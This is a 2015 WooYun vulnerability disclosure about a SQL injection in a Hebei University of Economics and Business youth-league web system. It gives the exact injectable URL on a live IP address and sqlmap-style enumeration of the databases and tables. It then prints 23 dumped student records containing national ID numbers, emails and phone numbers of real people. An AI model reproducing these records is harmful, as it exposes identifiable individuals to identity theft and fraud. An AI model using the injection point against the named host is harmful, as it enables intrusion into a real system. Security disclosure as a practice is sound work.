当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124292

漏洞标题:河北经贸大学某系统SQL注入泄漏敏感信息

相关厂商:CCERT教育网应急响应组

漏洞作者: 路人甲

提交时间:2015-07-05 10:08

修复时间:2015-07-10 10:10

公开时间:2015-07-10 10:10

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-05: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入洞 身份证号、QQ邮箱、手机号

详细说明:

http://124.239.192.62/
河北经贸大学团委
注入点:
http://124.239.192.62//SS_jieguo.aspx?Class=a&Title=Mr. (GET)

web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [6]:
[*] 2012_win
[*] gongqingtuan
[*] master
[*] model
[*] msdb
[*] tempdb


Database: gongqingtuan
+------------------------------------------------------+---------+
| Table | Entries |
+------------------------------------------------------+---------+
| dbo.t_student | 38726 |
| dbo.student_manger | 38724 |
| dbo.t_jiangcheng | 3448 |
| dbo.t_class | 1145 |
| dbo.class_manger | 1138 |
| dbo.t_admin | 1037 |
| dbo.studentAdmin | 896 |
| dbo.user_class | 896 |
| dbo.t_speciality | 172 |
| dbo.zhuanye_manger | 168 |
| dbo.user_college | 28 |
| dbo.t_college | 24 |
| dbo.t_contorl | 1 |
+------------------------------------------------------+---------+


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: gongqingtuan
Table: t_student
+--------------------+------+----+-----+---------------------------+-------------
| id | Cid | Cd | Sd | QQ | tel
+--------------------+------+----+-----+---------------------------+-------------
| 131124198507252227 | 24 | 20 | 42 | ztt860726@163.com | 18931997119
| 130632198811246426 | 389 | 33 | 125 | 406282755@qq.com | 13673138919
| 370302199011190019 | 1188 | 27 | 153 | 340002446@qq.com | 13315952267
| 121121122121212111 | 1045 | 34 | 184 | 222222@QQ.COM | 18323132434
| 131181199205201522 | 828 | 17 | 39 | 731069548@qq.com | 18232182795
| 130730199300000025 | 1030 | 34 | 184 | 995641917@qq.com | 15003288369
| 130582199303101055 | 635 | 22 | 90 | 1014514942@qq.com | 18233186340
| 130921198611265216 | 188 | 22 | 90 | 67839076@qq.com | 15103210836
| 130823198710181023 | 386 | 33 | 94 | 252160595@qq.com | 15130137920
| 130423198706104736 | 538 | 22 | 156 | hanyongchao_wusi@sina.com | 15833956137
| 130132198712105356 | 538 | 22 | 156 | Lizhijiang@126.com | 13463809268
| 130324199005150049 | 233 | 33 | 107 | 244634218@qq.com | 15233655771
| 130430198910010167 | 76 | 31 | 57 | janecastle@sina.com | 13383038859
| 370503198810290027 | 840 | 27 | 152 | ting151293530@126.com | 15100172837
| 130633199009066445 | 1152 | 23 | 144 | 931719737@qq.com | 18330179504
| 130126198810265445 | 76 | 31 | 57 | 790734023@qq.com | 15333211016
| 14242719901029634X | 558 | 21 | 29 | 406308959@qq.com | 15100153921
| 130904198605190610 | 376 | 33 | 125 | 87204758@qq.com | 18931121831
| 13092819880923432X | 476 | 28 | 65 | 781992978@qq.com | 13231100995
| 130421198602033328 | 159 | 25 | 87 | 418518839@qq.com | 15511399591
| 132201198703185772 | 157 | 25 | 86 | 864891310@qq.com | 15303314939
| 130725198710071921 | 286 | 17 | 27 | klsb07@126.com | 18931992753
| 130638198705214525 | 514 | 27 | 149 | 740008193@qq.com | 15833938321


漏洞证明:

1.png

修复方案:

注入点过了特殊参数

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-10 10:10

厂商回复:

最新状态:

暂无


漏洞评价:

评论